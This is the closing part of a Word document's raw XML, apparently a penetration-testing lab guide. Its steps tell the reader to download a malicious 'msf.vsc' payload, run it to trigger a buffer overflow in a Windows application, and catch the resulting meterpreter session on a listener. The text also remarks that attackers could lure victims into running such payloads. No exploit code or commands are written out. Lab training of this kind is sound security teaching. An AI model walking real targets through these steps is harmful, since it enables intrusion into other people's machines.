        <w:t>In real-time, attackers might craft similar payloads, share the download link with the victims and entice them into downloading and executing the application, thereby resulting in a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AE29F" w14:textId="367BE334"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539ADFEA" wp14:editId="7E2D9A0D">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1879499392"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224E02E" w14:textId="4058A533"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778CFDF4">
          <v:shape id="_x0000_i1129" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId49" w:name="DefaultOcxName20" w:shapeid="_x0000_i1129"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Right-click on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf.vsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> file and click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save link as…</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB90633" w14:textId="7AA8532B"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76F773B2" wp14:editId="5D50AA76">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1814968572"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42FA2EC" w14:textId="73D4D19D"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0E1E6FD3">
          <v:shape id="_x0000_i1128" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId51" w:name="DefaultOcxName21" w:shapeid="_x0000_i1128"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Select </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the left-pane as the download location. Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>File name</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> field and click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A341D" w14:textId="2B4810B2"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40B4A461" wp14:editId="3F7FF789">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1784587470"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AFE2A74" w14:textId="6131DEDF"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6D12F5F3">
          <v:shape id="_x0000_i1127" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId53" w:name="DefaultOcxName22" w:shapeid="_x0000_i1127"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>You can see the downloaded malicious payload on the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Now, double-click the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf.vsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> file and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Try</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> button to execute the payload. After executing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf.vsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload, a buffer overflow occurs on the application and this leads to windows exploitation, thereby gaining a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell for us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF8FE3" w14:textId="3CF4F3A3"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0B726DE2" wp14:editId="19326261">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="62753721"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2FD918" w14:textId="79374905" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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3FEE1B4B">
          <v:shape id="_x0000_i1126" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId55" w:name="DefaultOcxName23" w:shapeid="_x0000_i1126"/>
        </w:object>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidRPr="005369DA">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Parrot</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Open the Listener that has been launched earlier in this lab. You can see a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> session active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8618F" w14:textId="5163B429"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2C99DBD2" wp14:editId="40F3507D">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1660655878"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DB37DE4" w14:textId="2C42E77F" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="2592DD62">
          <v:shape id="_x0000_i1125" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId58" w:name="DefaultOcxName24" w:shapeid="_x0000_i1125"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to get the victim machine information. Close all the opened windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F196F3" w14:textId="1E20BE8F" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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5369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E43C721" wp14:editId="373C449B">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1101908166"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438E3AE" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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5369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, you have learned how to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer overflow vulnerability on a windows application and gain access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFFD69" w14:textId="77777777" w:rsidR="00A23699" w:rsidRPr="005369DA" w:rsidRDefault="00A23699"/>
    <w:sectPr w:rsidR="00A23699" w:rsidRPr="005369D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6DC03" w14:textId="77777777" w:rsidR="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F60EF11" w14:textId="77777777" w:rsidR="005369DA" w:rsidRDefault="005369DA" w:rsidP="0053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DA37B" w14:textId="77777777" w:rsidR="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5EC23B6E" w14:textId="77777777" w:rsidR="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369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01A5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B38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0181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109"/>
    <w:rsid w:val="00082109"/>
    <w:rsid w:val="005369DA"/>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27F62FBD-83E4-4ACE-8524-2879CAAA0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369DA"/>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5369DA"/>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369DA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="ヘッダー (文字)"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005369DA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005369DA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="フッター (文字)"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005369DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="見出し 1 (文字)"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005369DA"/>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5369DA"/>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5369DA"/>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5369DA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005369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157829">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="811945928">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2076737094">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="375"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1926763329">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2082870267">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1023481000">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1486047416">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="39091595">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="74013128">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="949698768">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1969822680">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1443838020">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="517237039">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1590432420">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="56033356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control" Target="activeX/activeX6.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX16.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.xm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control" Target="activeX/activeX20.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX24.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control" 